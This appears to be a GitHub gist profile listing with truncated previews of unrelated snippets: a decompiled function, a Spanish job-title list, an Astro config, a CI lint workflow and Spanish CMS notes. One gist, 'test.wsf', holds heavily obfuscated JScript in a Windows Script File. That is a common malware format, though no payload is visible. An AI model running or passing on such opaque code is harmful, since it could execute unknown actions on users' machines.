Skip to content

Instantly share code, notes, and snippets.

View Davis-3450's full-sized avatar
🫥
Mrowww

Davis Davis-3450

🫥
Mrowww
View GitHub Profile
uint64_t sub_140001000()
{
int16_t* rsi = nullptr;
int32_t rsi_1;
while (true)
{
PWSTR _String_1 = data_140005140;
if (!_String_1)
[
"Auxiliar de seguridad y salud en el trabajo",
"Cuidador de personas con discapacidad",
"Auxiliar de hogar geriátrico",
"Niñera",
"Madre comunitaria",
"Instrumentador quirúrgico",
"Técnico SISO",
"Auxiliar de laboratorio clínico",
"Auxiliar de farmacia o droguería",
@Davis-3450
Davis-3450 / astro-paper.config.ts
Last active June 19, 2026 07:43
astro content generators examples
import { defineAstroPaperConfig } from "./src/types/config";
export default defineAstroPaperConfig({
site: {
url: "https://astro-paper.pages.dev/",
title: "AstroPaper",
description: "A minimal, responsive and SEO-friendly Astro blog theme.",
author: "Sat Naing",
profile: "https://satna.ing",
ogImage: "default-og.jpg",
@Davis-3450
Davis-3450 / asterisk.md
Created April 4, 2026 17:15
asterisk cheat sheet

a

<package>
<job>
<script language="JScript">
WScript.Echo("Hello World");
</script>
</job>
</package>
@Davis-3450
Davis-3450 / test.wsf
Created February 24, 2026 11:06
test.wsf
<job>
<script language="JScript">
(function(_0x63fc2,_0x27b311){function _0x682f48(_0x4b2eaf,_0x4d5896,_0x1584eb,_0x307989,_0x34cf08){return _0x5b26(_0x4d5896-0x27d,_0x4b2eaf);}function _0x4b3fa5(_0x2244f3,_0x236970,_0x3b287f,_0x34985b,_0x3082a2){return _0x5b26(_0x3b287f-0x131,_0x236970);}function _0x5acb05(_0x4e8dc0,_0x2ac666,_0xd01035,_0x503e8c,_0x504e80){return _0x5b26(_0xd01035- -0x17,_0x504e80);}var _0x1c30d9=_0x63fc2();function _0x526fa6(_0xe844b8,_0x28a6d6,_0x185f83,_0x33379e,_0x51302d){return _0x5b26(_0x51302d-0x2d4,_0x185f83);}function _0x49d611(_0x1c33ad,_0x2e0e95,_0xbed1a9,_0x1c5d62,_0x33b2b3){return _0x5b26(_0x2e0e95-0x203,_0x1c5d62);}while(!![]){try{var _0x1e684c=parseInt(_0x4b3fa5(0x1e0,'Ua@o',0x1cf,0x155,0x239))/(0xfa9+-0xf27+-0x81)+-parseInt(_0x682f48('fF(j',0x36d,0x3cb,0x318,0x37c))/(0x1182+0x2173+-0x32f3)*(parseInt(_0x4b3fa5(0x309,'hbqc',0x28d,0x26c,0x21c))/(-0x1510+-0x5*0x2e2+-0x17*-0x18b))+parseInt(_0x526fa6(0x3e1,0x3c6,'$qWp',0x3c3,0x3fd))/(0xcd3+-0xc86+-0x49*0x1)+-parseInt(_0x682f48('!UR
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<remote
name="davis3450"
fetch="https://github.com/Davis-3450/" />
<remove-project name="platform/frameworks/base" />
<project
@Davis-3450
Davis-3450 / eslint.yml
Created December 15, 2025 09:55
generic eslint config with bun (trigger with PR)
name: ESLint
on:
push:
branches: ["main"]
pull_request:
branches: ["main"]
# schedule: (disabled for now)
# - cron: "41 20 * * 3"

Tenemos un repo para un CMS De testimonios.

Nuestros usuarios son:

user / publico -> tiene acceso a la API publica sin autenticacion

editor / autenticado -> tiene acceso a la api de edicion admin / autenticado -> tiene acceso a la api de edicion y puede aprobar posts

Estado de lint (bun lint)

  • Gravedad estimada: 7/10
  • 26 errores (bloquean), 75 warnings

Acciones críticas (bloquean)

  • Reemplazar any por tipos concretos:
    • src/features/auth/components/AuthLoginPage.tsx:42
    • src/features/auth/components/AuthSignupPage.tsx:48
    • src/features/projects/components/ProjectCreatePage.tsx:63
  • src/features/projects/components/ProjectList.tsx:28,136,208